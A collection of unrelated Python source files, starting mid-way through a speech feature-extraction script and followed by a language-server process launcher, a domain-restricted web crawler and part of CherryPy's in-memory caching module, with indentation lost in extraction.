file_list = read_txt(args.waveforms)
# check directory existence
if (args.wavdir is not None) and (not os.path.exists(args.wavdir)):
os.makedirs(args.wavdir)
if (args.wavgfdir is not None) and (not os.path.exists(args.wavgfdir)):
os.makedirs(args.wavgfdir)
if (args.wavfiltdir is not None) and (not os.path.exists(args.wavfiltdir)):
os.makedirs(args.wavfiltdir)
if not os.path.exists(args.hdf5dir):
os.makedirs(args.hdf5dir)
def feature_extract(cpu, wav_list, arr, max_frame_list, max_spc_frame_list):
n_wav = len(wav_list)
n_sample = 0
n_frame = 0
max_frame = 0
max_spc_frame = 0
count = 1
melfb_t = np.linalg.pinv(librosa.filters.mel(args.fs, args.fftl, n_mels=args.mel_dim))
for wav_name in wav_list:
# load wavfile and apply low cut filter
fs, x = read_wav(wav_name, cutoff=args.highpass_cutoff)
n_sample += x.shape[0]
logging.info("cpu-"+str(cpu+1)+" "+str(len(wav_list))+" "+wav_name+" "+str(x.shape[0])+" "+str(n_sample)+" "+str(count))
logging.info(wav_list)
# check sampling frequency
if not fs == args.fs:
logging.info("ERROR: sampling frequency is not matched.")
sys.exit(1)
hdf5name = args.hdf5dir + "/" + os.path.basename(wav_name).replace(".wav", ".h5")
if not args.init:
if args.minf0 != 40 and args.maxf0 != 700:
time_axis_range, f0_range, spc_range, ap_range = analyze_range(x, fs=fs, minf0=args.minf0, \
maxf0=args.maxf0, fperiod=args.shiftms, fftl=args.fftl)
else:
logging.info('open spk')
time_axis_range, f0_range, spc_range, ap_range = analyze(x, fs=fs, fperiod=args.shiftms, fftl=args.fftl)
write_hdf5(hdf5name, "/f0_range", f0_range)
write_hdf5(hdf5name, "/time_axis", time_axis_range)
melmagsp = melsp(x, n_mels=args.mel_dim, n_fft=args.fftl, shiftms=args.shiftms, winms=args.winms, fs=fs)
logging.info(melmagsp.shape)
write_hdf5(hdf5name, "/log_1pmelmagsp", np.log(1+10000*melmagsp))
uv_range, cont_f0_range = convert_continuos_f0(np.array(f0_range))
unique, counts = np.unique(uv_range, return_counts=True)
logging.info(dict(zip(unique, counts)))
cont_f0_lpf_range = \
low_pass_filter(cont_f0_range, int(1.0 / (args.shiftms * 0.001)), cutoff=20)
mcep_range = ps.sp2mc(spc_range, args.mcep_dim, args.mcep_alpha)
npow_range = spc2npow(spc_range)
_, spcidx_range = extfrm(mcep_range, npow_range, power_threshold=args.pow)
codeap_range = pw.code_aperiodicity(ap_range, fs)
cont_f0_lpf_range = np.expand_dims(cont_f0_lpf_range, axis=-1)
uv_range = np.expand_dims(uv_range, axis=-1)
unique, counts = np.unique(uv_range, return_counts=True)
logging.info(dict(zip(unique, counts)))
feat_orglf0 = np.c_[uv_range,np.log(cont_f0_lpf_range),codeap_range,mcep_range]
logging.info(feat_orglf0.shape)
write_hdf5(hdf5name, "/feat_org_lf0", feat_orglf0)
write_hdf5(hdf5name, "/spcidx_range", spcidx_range)
logging.info(hdf5name)
n_codeap = codeap_range.shape[-1]
for i in range(n_codeap):
logging.info('codeap: %d' % (i+1))
uv_codeap_i, cont_codeap_i = convert_continuos_codeap(np.array(codeap_range[:,i]))
cont_codeap_i = np.log(-np.clip(cont_codeap_i, a_min=np.amin(cont_codeap_i), a_max=MAX_CODEAP))
if i > 0:
cont_codeap = np.c_[cont_codeap, np.expand_dims(cont_codeap_i, axis=-1)]
else:
uv_codeap = np.expand_dims(uv_codeap_i, axis=-1)
cont_codeap = np.expand_dims(cont_codeap_i, axis=-1)
uv_codeap_i = np.expand_dims(uv_codeap_i, axis=-1)
unique, counts = np.unique(uv_codeap_i, return_counts=True)
logging.info(dict(zip(unique, counts)))
logging.info((uv_range==uv_codeap_i).all())
logging.info((uv_codeap==uv_codeap_i).all())
logging.info(uv_codeap.shape)
logging.info(cont_codeap.shape)
feat_mceplf0cap = np.c_[uv_range, np.log(cont_f0_lpf_range), uv_codeap, cont_codeap, mcep_range]
logging.info(feat_mceplf0cap.shape)
write_hdf5(hdf5name, "/feat_mceplf0cap", feat_mceplf0cap)
n_frame += feat_orglf0.shape[0]
if max_frame < feat_orglf0.shape[0]:
max_frame = feat_orglf0.shape[0]
if max_spc_frame < spcidx_range[0].shape[0]:
max_spc_frame = spcidx_range[0].shape[0]
if args.highpass_cutoff != 0 and args.wavfiltdir is not None:
sf.write(args.wavfiltdir + "/" + os.path.basename(wav_name), x, fs, 'PCM_16')
wavpath = args.wavdir + "/" + os.path.basename(wav_name)
logging.info("cpu-"+str(cpu+1)+" "+wavpath)
sp_rec = ps.mc2sp(mcep_range, args.mcep_alpha, args.fftl)
wav = np.clip(pw.synthesize(f0_range, sp_rec, ap_range, fs, frame_period=args.shiftms), \
-1, 1)
logging.info(wavpath)
sf.write(wavpath, wav, fs, 'PCM_16')
recmagsp = np.matmul(melfb_t, melmagsp.T)
hop_length = int((args.fs/1000)*args.shiftms)
win_length = int((args.fs/1000)*args.winms)
wav = np.clip(librosa.core.griffinlim(recmagsp, hop_length=hop_length, win_length=win_length, window='hann'), -1, 1)
wavpath = args.wavgfdir + "/" + os.path.basename(wav_name)
logging.info(wavpath)
sf.write(wavpath, wav, fs, 'PCM_16')
else:
time_axis, f0, spc, ap = analyze(x, fs=fs, fperiod=args.shiftms, fftl=args.fftl)
write_hdf5(hdf5name, "/f0", f0)
npow = spc2npow(spc)
write_hdf5(hdf5name, "/npow", npow)
n_frame += f0.shape[0]
if max_frame < f0.shape[0]:
max_frame = f0.shape[0]
count += 1
arr[0] += n_wav
arr[1] += n_sample
arr[2] += n_frame
max_frame_list.append(max_frame)
max_spc_frame_list.append(max_spc_frame)
if (n_wav > 0):
logging.info(str(arr[0])+" "+str(n_wav)+" "+str(arr[1])+" "+str(n_sample/n_wav)+" "+\
str(arr[2])+" "+str(n_frame/n_wav)+" max_frame = "+str(max_frame)+" max_spc_frame = "+str(max_spc_frame))
# divie list
file_lists = np.array_split(file_list, args.n_jobs)
file_lists = [f_list.tolist() for f_list in file_lists]
for i in range(len(file_lists)):
logging.info('cpu-%d %d' % (i+1, len(file_lists[i])))
logging.info(file_lists[i])
# multi processing
with mp.Manager() as manager:
processes = []
arr = mp.Array('d', 3)
max_frame_list = manager.list()
max_spc_frame_list = manager.list()
i = 0
for f in file_lists:
p = mp.Process(target=feature_extract, args=(i, f,arr,max_frame_list,max_spc_frame_list))
p.start()
processes.append(p)
i += 1
# wait for all process
for p in processes:
p.join()
logging.info(str(arr[0])+" "+str(arr[1])+" "+str(arr[1]/arr[0])+" "+str(arr[2])+" "+str(arr[2]/arr[0]))
logging.info('max_frame: %ld' % (np.max(max_frame_list)))
logging.info('max_spc_frame: %ld' % (np.max(max_spc_frame_list)))
if __name__ == "__main__":
main()
|
process.py
|
from .logging import debug, exception_log, server_log
import subprocess
import os
import shutil
import threading
try:
from typing import Any, List, Dict, Tuple, Callable, Optional, Union, IO
assert Any and List and Dict and Tuple and Callable and Optional and Union and IO
except ImportError:
pass
def add_extension_if_missing(server_binary_args: 'List[str]') -> 'List[str]':
if len(server_binary_args) > 0:
executable_arg = server_binary_args[0]
fname, ext = os.path.splitext(executable_arg)
if len(ext) < 1:
path_to_executable = shutil.which(executable_arg)
# what extensions should we append so CreateProcess can find it?
# node has .cmd
# dart has .bat
# python has .exe wrappers - not needed
for extension in ['.cmd', '.bat']:
if path_to_executable and path_to_executable.lower().endswith(extension):
executable_arg = executable_arg + extension
updated_args = [executable_arg]
updated_args.extend(server_binary_args[1:])
return updated_args
return server_binary_args
def start_server(server_binary_args: 'List[str]', working_dir: str,
env: 'Dict[str,str]', attach_stderr: bool) -> 'Optional[subprocess.Popen]':
si = None
if os.name == "nt":
server_binary_args = add_extension_if_missing(server_binary_args)
si = subprocess.STARTUPINFO() # type: ignore
si.dwFlags |= subprocess.SW_HIDE | subprocess.STARTF_USESHOWWINDOW # type: ignore
debug("starting " + str(server_binary_args))
stderr_destination = subprocess.PIPE if attach_stderr else subprocess.DEVNULL
return subprocess.Popen(
server_binary_args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=stderr_destination,
cwd=working_dir,
env=env,
startupinfo=si)
def attach_logger(process: 'subprocess.Popen', stream: 'IO[Any]') -> None:
threading.Thread(target=log_stream, args=(process, stream)).start()
def log_stream(process: 'subprocess.Popen', stream: 'IO[Any]') -> None:
"""
Reads any errors from the LSP process.
"""
running = True
while running:
running = process.poll() is None
try:
content = stream.readline()
if not content:
break
try:
decoded = content.decode("UTF-8")
except UnicodeDecodeError:
# todo: do we still need this ?
decoded = content # type: ignore
server_log(decoded.strip())
except IOError as err:
exception_log("Failure reading stream", err)
return
debug("LSP stream logger stopped.")
|
crawler.py
|
import logging
import time
import re
import urllib.parse
from queue import Empty
from multiprocessing import Process, Event
from queue import Queue as Queue
from multiprocessing import Queue as MPQueue
from threading import Thread
from enum import Enum
# Used to enable launch as a main
import os.path, sys
sys.path.insert(0, os.path.abspath('.'))
from webmining.html5wrapper import HTML5Wrapper
from webmining.seed import Seed, SeedElement
from webmining.fetcher import Fetcher, Timeout
from webmining.website import Website
from webmining.meta_extractor import MetaExtractor, MetaExtractionException
from webmining import LIB_PATH
__author__ = "https://github.com/MinistereSupRecherche"
__email__ = "github@recherche.gouv.fr"
__status__ = "dev"
PAGE_SIZE_LIMIT = 300000
class CrawlMode(Enum):
#crawling an entire domain
entire = "entire"
#crawling a subdomain
subpath = "subpath"
#crawling a single page
single = "single"
class Crawler:
"""
A generic crawler.
"""
def __init__(self, filename=None, seedlist=None, debug=False, proxy=None, multiproc=True,
mode=CrawlMode.entire, max_page_size=PAGE_SIZE_LIMIT):
"""
:param filename: path to the seed file
:param mode: crawling mode, either "entire", "single", "subpath"
"""
self.seed = None
self.debug = debug
# init the fetcher with a download limit size
self.fetcher = Fetcher(proxy, max_page_size=max_page_size)
self.htmltools = HTML5Wrapper()
self.crawl_depth = 0 # Do we crawl domains outside the seed
self.domain_depth = 0 # At which depth each seed element must be crawled
self.page_limit = 0 # Max amount of pages to be crawled
self.max_page_size = max_page_size
self.website = Website()
self.me = MetaExtractor(proxy=proxy)
self.badextensions = set(["pdf", "xls", "doc", "ppt", "rtf", "odt", "zip", "tar.gz", "tar", "exe", \
"jpg", "png", "jpeg", "bmp", "gif", "mp3", "flv", "rar", "ogv", "avi", "mp4", \
"mkg", "ps", "ogg", "webm", "ogm", "pps", "pptx", "docx", "xlsx", "mpg", "mov", \
"mkv", "mpeg", "m4v", "iso"])
self.crawling_process_over = False
# Logging initialization
self.logger = logging.getLogger("webmining:crawler")
self.logger.setLevel(logging.INFO)
if debug:
self.logger.setLevel(logging.DEBUG)
self.filename = filename
self.seedlist = seedlist
self.mode = mode
self.authorized_domains = set()
def _monitore_processes(self, processes):
"""
Checks if subcrawling processes are over.
This method is meant to be used wrapped into a Thread.
"""
for p in processes:
p["event"].wait()
self.crawling_process_over = True
def spawn_crawl_processes(self, html2txt, metas, proc, wait_courtesy):
processes = []
for i in range(0, proc):
e = Event()
p = Process(None, self._sub_crawl, None, (), {"queue": self.seed.q, "storage": self.storage, "end_event": e, \
"wait": wait_courtesy, "html2txt": html2txt, "metas": metas})
p.start()
processes.append({"proc": p, "event": e, "id": i})
monitor = Thread(group=None, target=self._monitore_processes, name=None, args=(),
kwargs={"processes": processes})
monitor.start()
while not self.crawling_process_over:
# If all processes are over, or if getting an element
# from queue takes more than timeout seconds (which seems empirically abnormal)
# then crawl is finished.
c = 0
for p in processes:
if not p["proc"].is_alive():
c += 1
if c >= len(processes):
self.logger.warning("All processes are dead !")
break
try:
el = self.storage.get(block=True, timeout=5)
yield el
except Empty:
if self.storage.empty():
pass
self.logger.debug("joining processes...")
for p in processes:
if p["proc"].is_alive():
p["proc"].terminate()
p["proc"].join()
# Finally, joining monitoring thread
monitor.join(3)
if monitor.is_alive():
monitor._stop()
def crawl(self, proc=None, domain_depth=0, crawl_depth=0, page_limit=None, wait_courtesy=0, html2txt=False,
metas=None):
"""
:param proc: amount of processes to spawn, 0 or None can be used to exploit the current process
:param domain_depth: crawling depth for each seed element (inside original domain)
:param crawl_depth: crawling depth for each seed element (outside original domain)
:param page_limit: max amount of page to crawl
:param wait_courtesy: time in second between each fetch
:param html2txt: resulting pages must be raw html (default), or cleant txt
:param metas: metas we want to extract during crawling
"""
self.domain_depth = domain_depth
self.crawl_depth = crawl_depth
self.page_limit = page_limit
# lazy loading, to know if we need to implement seeds with multiproc or not
if self.seed is None:
if self.filename is not None:
self.seed = Seed(f=self.filename, multiproc=not (proc is None or proc == 0))
elif self.seedlist is not None:
self.seed = Seed(s=self.seedlist, multiproc=not (proc is None or proc == 0))
if proc is None or proc == 0:
self.storage = Queue() # Will contain shared crawl results
self._sub_crawl(self.seed.q, self.storage, Event(), wait_courtesy, html2txt, metas, None)
while True:
try:
el = self.storage.get(block=False)
yield el
except Empty:
break
else:
self.storage = MPQueue() # Will contain shared crawl results
yield from self.spawn_crawl_processes(html2txt, metas, proc, wait_courtesy)
def _sub_crawl(self, queue, storage, end_event, wait, html2txt, metas, block_timeout=5):
"""
This private method will be wrapped into a process,
and is in charge of dequeuing seed elements, and recording results into
the storage.
"""
while True:
se = None
pages = []
try:
se = queue.get(block=block_timeout is not None, timeout=block_timeout)
except Empty:
end_event.set()
return
self.logger.info("Launched crawl [%s]" % se.url)
start_url = se.url # Need to keep it as it may change due to redirect
pages = self.crawl_domain(se, self.domain_depth, wait, html2txt, self.page_limit, self.mode)
self.logger.info("Crawl over with %d pages [%s]"
% (len(pages), (se.url if start_url in se.url else '%s -> %s' % (start_url, se.url))))
first = True
for url in pages:
se = pages[url]
ext_metas = {}
# Extract asked metas from page
if metas is not None:
try:
ext_metas = self.me.extract(metas, se.html, se.relevant_txt, \
url=url, firstpage=first)
first = False
except MetaExtractionException as e:
self.logger.warning("Impossible to extract metas in [%s]: " % url)
self.logger.warning(e)
continue
for m in ext_metas:
if ext_metas[m] is not None:
if m not in se.metas.keys():
if m in ["contact", "phone", "fax"]:
se.metas[m] = []
else:
se.metas[m] = set()
if m in ["contact", "phone", "fax"]:
se.metas[m].extend(ext_metas[m])
else:
se.metas[m].add(ext_metas[m])
storage.put(se)
# Let's save memory
del pages
if self.crawl_depth > 0:
# TODO: create new seed elements to put in queue when crawl deeper than 0
# with an updated depth, domain, etc...
raise Exception("Not implemented")
def _check_first_page(self, dom, url):
"""
Checks if domain first page is
- a html redirection
- a frameset
returns an url to follow, or None if nothing detected.
"""
# we check out if it contains a <meta http-equiv="refresh"
# ex. <meta http-equiv="Refresh" content="0; URL=corporate-finance/corporate-finance-presentation.html">
metas = dom("meta[http-equiv='refresh'][content], meta[http-equiv='Refresh'][content], meta[http-equiv='REFRESH'][content]")
#raise Exception("type of metas : " + str(type(metas)) + "\n" + str(dir(metas)))
base_url = self._get_base_url(dom, url)
for m in metas.items():
content = m.attr.content
m = re.search("url\s?=\s?(.*?)\s", content + ' ', flags=re.I)
if m is not None:
rurl = m.group(1).strip()
rurl = urllib.parse.urljoin(base_url, rurl)
self.logger.info("HTTP redirection to [%s]" % rurl)
return rurl
# We check out if it contains a <frame src="..."
# and only return first found url if true
# TODO: is it relevant to return only the first frame?
frames = dom("frame[src]")
for f in frames.items():
rurl = urllib.parse.urljoin(base_url, f.attr.src)
self.logger.info("FRAME redirection to [%s]" % rurl)
return rurl
# We check out if it contains a JS redirection document.location.href=
# and only return first found url if true
scripts = dom("script")
for s in scripts.items():
js = s.text()
if js is not None:
m = re.search("document.location.href\s?=\s?[\"']([^\"]*?)[\"']\s*[^+]", js + " ", flags=re.I)
if m is not None:
rurl = urllib.parse.urljoin(base_url, m.group(1).strip())
self.logger.info("JavaScript redirection to [%s]" % rurl)
return rurl
return None
def _verify_and_parse_result(self, fresult, seed_el):
"""
Verify if a fetch result is valid for parsing. If so, it will build the pq element that correspond to the webpage
:param fresult: FetchResult object
:param seed_el: SeedElement object
:return: The pq element that correspond
"""
if fresult is None:
return None
html = fresult.webpage
content_type = fresult.content_type
# in case of 300/302 we use final url given by fetcher
seed_el.url = fresult.fetched_url
if fresult.http_status is None or fresult.http_status != 200:
self.logger.warning("Bad HTTP Status (%s) for [%s]" % (str(fresult.http_status), seed_el.url))
return None
if html is None:
self.logger.warning("Impossible to crawl [%s]" % seed_el.url)
# Missed page not ignored, as this kind of websites can be dangerous
return None
# We only want to compute text/html webpages
if content_type is not None and "text/html" not in content_type.lower():
self.logger.info("Content Type ignored : " + str(content_type) + " [" + seed_el.url + "]")
return None
# Too large file
self.logger.debug("Page size of %d characters" % len(html))
if len(html) > self.max_page_size:
self.logger.warning("Page ignored, too big (%d characters) in %s" % (len(html), seed_el.url))
return None
# Is an attachment, so we must ignore it
if fresult.attachment is not None:
self.logger.warning(
"Page ignored, because it correspond to the attachment %s [%s]" % (fresult.attachment, seed_el.url))
return None
if len(html) == 0:
self.logger.warning("Page ignored because it is empty [%s]" % seed_el.url)
return None
try:
dom = self.htmltools.pq(html)
except Exception as e:
self.logger.warning("Impossible to parse html url=%s : %s" % (fresult.fetched_url, str(e)))
return None
# DEACTIVATED FEATURE
# Test to see if the root node is a html node
# if dom[0].tag.lower() != 'html':
# self.logger.warning("Page is not a valid html [%s]" % seed_el.url)
# return None
return dom
@staticmethod
def _generate_authorized_domains(domain):
domain = domain.lower() # Force lower case
auth = set([domain])
if "www." in domain:
auth.add(domain.replace("www.", ""))
else:
auth.add("www." + domain)
comdom = {dom.rsplit(".", maxsplit=1)[0] + ".com" for dom in auth if ".com" not in dom}
auth.update(comdom)
return auth
def _is_authorized_subpath(self, init_url, target_url):
# Force Lower case
init_url = init_url.lower() if init_url is not None else init_url
target_url = target_url.lower() if target_url is not None else target_url
init_path = urllib.parse.urlparse(init_url).path
target_url_parsed = urllib.parse.urlparse(target_url)
target_domain, target_path = target_url_parsed.netloc, target_url_parsed.path
if target_domain in self.authorized_domains and target_path.startswith(init_path):
return True
return False
def crawl_domain(self, init_seed_el, max_dom_depth, wait, html2txt, limit=None, mode=CrawlMode.entire):
"""
Fetches a domain, and then crawls its internal pages until given depth.
Returns a dictionary of url -> html code.
"""
pages = {}
visited = set() # Already visited URLs
found_links = [init_seed_el] # List of found links as SeedElements, waiting to be fetched
#overides the limit to crawl only one page
if mode == CrawlMode.single:
limit = 1
max_dom_depth = 1
self.logger.info("Launching crawl in the %s mode" % mode.value)
# -- Managing authorized domains for this crawl --
domain = urllib.parse.urlparse(init_seed_el.url).netloc
self.authorized_domains = self._generate_authorized_domains(domain)
self.logger.info("Authorized domains for this crawl : %s" % str(self.authorized_domains))
# Looping through found urls
while True:
if limit is not None and len(visited) > limit:
self.logger.info("Max amount of pages reached ! (%d)" % limit)
return pages
self.logger.debug("%d url visited so far" % len(visited))
seed_el = None # Current element being computed, in while loop
try:
while True:
seed_el = found_links.pop(0)
if seed_el.url not in visited:
break
visited.add(seed_el.url) # A popped element is considered visited
except IndexError:
self.logger.info("No more links to visit for this website.")
return pages
# Fetching URL given in seed element in param
self.logger.debug("Fetching " + seed_el.url)
fresult = None
retry = 0
max_retry = 2 # TODO - VYS - Make this configurable
while fresult is None and retry <= max_retry:
try:
fresult = self.fetcher.fetch(seed_el.url, self.debug, timeout=10)
# If we're here it means that no more retry are needed, disable it
retry = max_retry + 1
except Timeout:
self.logger.warning("Timeout while fetching %s%s" % (
seed_el.url, (", lets retry (max retry %s)" % max_retry) if retry == 0 else (
" - retry %s/%s" % (retry, max_retry))))
retry += 1
continue
if fresult is None:
continue
if wait > 0:
time.sleep(wait)
# Lets do a quick check if we don't get a redirect
rurl30X = None
if fresult.fetched_url != seed_el.url:
rurl30X = fresult.fetched_url
self.logger.warning("Got a redirect to %s when fetching %s" % (fresult.fetched_url, seed_el.url))
dom = self._verify_and_parse_result(fresult, seed_el)
if dom is None:
self.logger.warning("Found no DOM for %s" % seed_el.url)
continue
# normalize root urls to avoid a double visit at http://www.example.com/ and http://www.example.com
path = urllib.parse.urlparse(seed_el.url).path
if path == '':
seed_el.url += '/'
self.logger.debug("Fetched [%s] " % seed_el.url)
# If this page is the first one for this domain,
# we check out if it contains a <meta http-equiv="refresh"
# The same if this page is the second one,
# because sometimes a redirection is followed by a frame
if len(visited) < 2:
rurl = self._check_first_page(dom, seed_el.url)
rurl = rurl if rurl is not None else rurl30X
if rurl is not None:
domain = urllib.parse.urlparse(rurl).netloc
domain = domain.lower()
# If we are following a redirect, we also add it to the set of authorized domains
# to be able to follow next urls.
self.authorized_domains.add(domain)
if "www." in domain:
self.authorized_domains.add(domain.replace("www.", ""))
else:
self.authorized_domains.add("www." + domain)
self.logger.info("New authorized domains for this crawl : %s" % str(self.authorized_domains))
if seed_el.url in visited:
pass
else:
visited.add(seed_el.url)
# Adding detected url to follow
ser = SeedElement(rurl, seed_el.groupid)
ser.depth = seed_el.depth + 1
found_links.append(ser)
# If the new page url, after redirections, is outside authorized domains, don't use it
if urllib.parse.urlparse(seed_el.url).netloc.lower() not in self.authorized_domains:
self.logger.warning("redirection to %s don't exits from authorized domains, page not analyzed" % seed_el.url)
continue
if mode == CrawlMode.subpath and not self._is_authorized_subpath(init_seed_el.url, seed_el.url):
self.logger.warning("subpath mode: redirection to %s exists from authorized subpaths, page not analyzed" % seed_el.url)
continue
# ---
# HTML computing
# ---
# Converting html into "clean" and interesting text
relevant_txt = self.website.extract_meaningful_text(dom)
# Builds a new Seed Element from popped element
se = SeedElement(seed_el.url, seed_el.groupid)
se.depth = seed_el.depth
se.relevant_txt = relevant_txt
if fresult is not None:
se.html = fresult.webpage
se.content_type = fresult.content_type
se.charset = fresult.charset
se.http_status = fresult.http_status
se.headers = fresult.headers
# Sometimes DOM is too deep to extract title properly
se.title = self.website.extract_title(dom)
pages[seed_el.url] = se
visited.add(seed_el.url) # May be different from original, cause of redirections
# This page has been computed, let's now extract its links
# if ymax depth not reached
if seed_el.depth + 1 > max_dom_depth:
continue
if mode != CrawlMode.single:
found_links.extend(self._extract_links(dom, init_seed_el, seed_el, visited, mode))
self.logger.debug("Out of while loop.")
return pages
def _get_base_url(self, dom, url):
# check if there is a 'base' tag for link compute
base_url = dom('base').attr('href')
if base_url is None:
base_url = url
return base_url
def _extract_links(self, dom, init_seed_el, seed_el, visited, mode):
"""
Given a dom, extract internal links to crawl
"""
# ---
# Link extraction and checking
# ---
links = {}
selected_links = []
added = set()
# DOM is sometimes to deep to extract links properly
try:
links = self.htmltools.extract_doc_links(dom)
except Exception as e:
links = {}
self.logger.warning("Impossible to extract links from %s : %s" % (seed_el.url, str(e)))
base_url = self._get_base_url(dom, seed_el.url)
for key in links:
# We do not want anchors to be crawled
key = key.split("#")[0]
if len(key) < 1:
continue
url = None
try:
url = urllib.parse.urljoin(base_url, key)
except Exception as e:
# Invalid url, ignoring
self.logger.warning("Invalid urljoin (%s,%s): %s" % (base_url, key, str(e)))
continue
# Trying to get eventual file extension, and to check its validity
path = urllib.parse.urlparse(url).path
if path == '':
url += '/'
else:
ext = path.split('.')[-1].strip().lower()
if ext in self.badextensions:
self.logger.debug("Bad extension [%s] in %s" % (ext, url))
continue
# Let's check if it's an internal link, and not an outgoing one
if urllib.parse.urlparse(url).netloc.lower() in self.authorized_domains and \
url not in visited and url not in added:
if mode == CrawlMode.subpath and not self._is_authorized_subpath(init_seed_el.url, url):
continue
se = SeedElement(url, seed_el.groupid)
se.depth = seed_el.depth + 1
selected_links.append(se)
added.add(url)
return selected_links
# for testing purpose
if __name__ == "__main__":
logging.basicConfig(level=logging.WARNING,
format='[%(levelname)s][%(name)s][%(asctime)s] %(message)s')
# def crawl(self, storage, proc=1, domain_depth=0, crawl_depth=0):
c = Crawler(LIB_PATH + "resources/testseed.txt")
count = 0
# def crawl(self, proc=1, domain_depth=0, crawl_depth=0, page_limit=None, wait_courtesy=0, html2txt=False, metas=None):
for se in c.crawl(proc=2, domain_depth=2, crawl_depth=0, page_limit=80, wait_courtesy=0.1):
# print(se)
count += 1
print("%d elements have been crawled !" % count)
|
caching.py
|
import datetime
import threading
import time
import cherrypy
from cherrypy.lib import cptools, httputil
class Cache(object):
def get(self):
raise NotImplemented
def put(self, obj, size):
raise NotImplemented
def delete(self):
raise NotImplemented
def clear(self):
raise NotImplemented
# ------------------------------- Memory Cache ------------------------------- #
class AntiStampedeCache(dict):
def wait(self, key, timeout=5, debug=False):
"""Return the cached value for the given key, or None.
If timeout is not None (the default), and the value is already
being calculated by another thread, wait until the given timeout has
elapsed. If the value is available before the timeout expires, it is
returned. If not, None is returned, and a sentinel placed in the cache
to signal other threads to wait.
If timeout is None, no waiting is performed nor sentinels used.
"""
value = self.get(key)
if isinstance(value, threading._Event):
if timeout is None:
# Ignore the other thread and recalc it ourselves.
if debug:
cherrypy.log('No timeout', 'TOOLS.CACHING')
return None
# Wait until it's done or times out.
if debug:
cherrypy.log('Waiting up to %s seconds' % timeout, 'TOOLS.CACHING')
value.wait(timeout)
if value.result is not None:
# The other thread finished its calculation. Use it.
if debug:
cherrypy.log('Result!', 'TOOLS.CACHING')
return value.result
# Timed out. Stick an Event in the slot so other threads wait
# on this one to finish calculating the value.
if debug:
cherrypy.log('Timed out', 'TOOLS.CACHING')
e = threading.Event()
e.result = None
dict.__setitem__(self, key, e)
return None
elif value is None:
# Stick an Event in the slot so other threads wait
# on this one to finish calculating the value.
if debug:
cherrypy.log('Timed out', 'TOOLS.CACHING')
e = threading.Event()
e.result = None
dict.__setitem__(self, key, e)
return value
def __setitem__(self, key, value):
"""Set the cached value for the given key."""
existing = self.get(key)
dict.__setitem__(self, key, value)
if isinstance(existing, threading._Event):
# Set Event.result so other threads waiting on it have
# immediate access without needing to poll the cache again.
existing.result = value
existing.set()
class MemoryCache(Cache):
"""An in-memory cache for varying response content.
Each key in self.store is a URI, and each value is an AntiStampedeCache.
The response for any given URI may vary based on the values of
"selecting request headers"; that is, those named in the Vary
response header. We assume the list of header names to be constant
for each URI throughout the lifetime of the application, and store
that list in self.store[uri].selecting_headers.
The items contained in self.store[uri] have keys which are tuples of request
header values (in the same order as the names in its selecting_headers),
and values which are the actual responses.
"""
maxobjects = 1000
maxobj_size = 100000
maxsize = 10000000
delay = 600
antistampede_timeout = 5
expire_freq = 0.1
debug = False
def __init__(self):
self.clear()
# Run self.expire_cache in a separate daemon thread.
t = threading.Thread(target=self.expire_cache, name='expire_cache')
self.expiration_thread = t
if hasattr(threading.Thread, "daemon"):
# Python 2.6+
t.daemon = True
else:
t.setDaemon(True)
t.start()
def clear(self):
"""Reset the cache to its initial, empty state."""
self.store = {}
self.expirations = {}
self.tot_puts = 0
self.tot_gets = 0
self.tot_hist = 0
self.tot_expires = 0
self.tot_non_modified = 0
self.cursize = 0
def expire_cache(self):
# expire_cache runs in a separate thread which the servers are
# not aware of. It's possible that "time" will be set to None
# arbitrarily, so we check "while time" to avoid exceptions.
# See tickets #99 and #180 for more information.
while time:
now = time.time()
# Must make a copy of expirations so it doesn't change size
# during iteration
for expiration_time, objects in self.expirations.items():
if expiration_time <= now:
for obj_size, uri, sel_header_values in objects:
try:
del self.store[uri][sel_header_values]
self.tot_expires += 1
self.cursize -= obj_size
except KeyError:
# the key may have been deleted elsewhere
pass
del self.expirations[expiration_time]
time.sleep(self.expire_freq)
def get(self):
"""Return the current variant if in the cache, else None."""
request = cherrypy.serving.request
self.tot_gets += 1
uri = cherrypy.url(qs=request.query_string)
uricache = self.store.get(uri)
if uricache is None:
return None
header_values = [request.headers.get(h, '')
for h in uricache.selecting_headers]
header_values.sort()
variant = uricache.wait(key=tuple(header_values),
timeout=self.antistampede_timeout,
debug=self.debug)
if variant is not None:
self.tot_hist += 1
return variant
def put(self, variant, size):
"""Store the current variant in the cache."""
request = cherrypy.serving.request
response = cherrypy.serving.response
uri = cherrypy.url(qs=request.query_string)
uricache = self.store.get(uri)
if uricache is None:
uricache = AntiStampedeCache()
uricache.selecting_headers = [
e.value for e in response.headers.elements('Vary')]
self.store[uri] = uricache
if len(self.store) < self.maxobjects:
total_size = self.cursize + size
# checks if there's space for the object
if (size < self.maxobj_size and total_size < self.maxsize):
# add to the expirations list
expiration_time = response.time + self.delay
bucket = self.expirations.setdefault(expiration_time, [])
bucket.append((size, uri, uricache.selecting_headers))
# add to the cache
header_values = [request.headers.get(h, '')
for h in uricache.selecting_headers]
header_values.sort()
uricache[tuple(header_values)] = variant
self.tot_puts += 1
self.cursize = total_size
def delete(self):
"""Remove ALL cached variants of the current resource."""
uri = cherrypy.url(qs=cherrypy.serving.request.query_string)
self.store.pop(uri, None)
def get(invalid_methods=("POST", "PUT", "DELETE"), debug=False, **kwargs):
"""Try to obtain cached output. If fresh enough, raise HTTPError(304).
If POST, PUT, or DELETE:
* invalidates (deletes) any cached response for this resource
* sets request.cached = False
* sets request.cacheable = False
else if a cached copy exists:
* sets request.cached = True
* sets request.cacheable = False
* sets response.headers to the cached values
* checks the cached Last-Modified response header against the
current If-(Un)Modified-Since request headers; raises 304
if necessary.
* sets response.status and response.body to the cached values
* returns True
otherwise:
* sets request.cached = False
* sets request.cacheable = True
* returns False
"""
request = cherrypy.serving.request
response = cherrypy.serving.response
if not hasattr(cherrypy, "_cache"):
# Make a process-wide Cache object.
cherrypy._cache = kwargs.pop("cache_class", MemoryCache)()
# Take all remaining kwargs and set them on the Cache object.
for k, v in kwargs.items():
setattr(cherrypy._cache, k, v)
cherrypy._cache.debug = debug
# POST, PUT, DELETE should invalidate (delete) the cached copy.
# See http://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html#sec13.10.
if request.method in invalid_methods:
if debug:
cherrypy.log('request.method %r in invalid_methods %r' %
(request.method, invalid_methods), 'TOOLS.CACHING')
cherrypy._cache.delete()
request.cached = False
request.cacheable = False
return False
if 'no-cache' in [e.value for e in request.headers.elements('Pragma')]:
request.cached = False
request.cacheable = True
return False
cache_data = cherrypy._cache.get()
